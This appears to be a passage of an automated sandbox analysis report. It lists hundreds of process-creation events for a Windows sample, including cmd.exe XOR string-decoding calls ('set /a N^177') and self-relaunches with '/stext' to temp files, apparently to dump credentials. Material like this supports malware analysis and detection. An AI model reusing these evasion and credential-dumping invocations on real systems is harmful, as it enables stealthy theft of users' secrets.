Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe "C:\Users\user\Desktop\asXlZG3aW6.exe"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
